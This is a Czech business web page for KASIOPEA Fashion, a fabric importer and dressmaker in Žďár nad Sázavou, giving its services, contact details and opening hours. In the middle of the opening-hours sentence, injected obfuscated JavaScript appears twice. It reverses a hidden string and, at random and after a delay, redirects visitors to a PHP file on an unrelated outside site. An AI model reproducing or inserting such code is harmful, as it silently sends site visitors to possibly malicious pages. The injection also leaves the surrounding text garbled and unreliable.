Rainbow page separator

KASIOPEA Fashion – látky z emirátů

[tab name="Informace"]

www.latkyzemiratu.cz

KASIOPEA Fashion

Zabýváme se dovozem látek ze Spojených arabských emirátů od roku 2007.

Dovážíme především látky dle přání našich zákazníků, zejména hedvábí, krajky, společenské látky, úplety a mnoho dalších. Dovážíme látky také z Itálie, Německa a Polska.

 

Jsme schopni zajistit látky i na individuální přání zákazníků na různé společenské události, např. svatby, plesy, promoce, taneční.

Pořádáme dámské kluby a módní přehlídky, aby se zákaznice seznámily s aktuální nabídkou a prohlédly si nové trendy v látkách i módě.

 

Šijeme také svoji konfekci pod značkou KASIOPEA Fashion.

Dámské krejčové jsou k dispozici našim zákazníkům dvakrát týdně u nás v prodejně.

Na prodejně najdete kromě látek a vlastní konfekce také kabelky, peněženky, bižuterii a šátky.

Kontakt:

  KASIOPEA Fashion Kateřina Kuncová Dolní č. 1, budova České pojišťovny, přízemí 591 01 Žďár nad Sázavou

Tel.: +420 605 451 551

 Web: www.latkyzemiratu.cz

E-mail: katerinakuncova@seznam.cz

Otevírací doba:

  • po-pá - 9.00 - 17.00 hod.

Dvakrát týdně pří["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tomna dámská krejčová, bližší informace na prodejně.           [/tab] [end_tabset]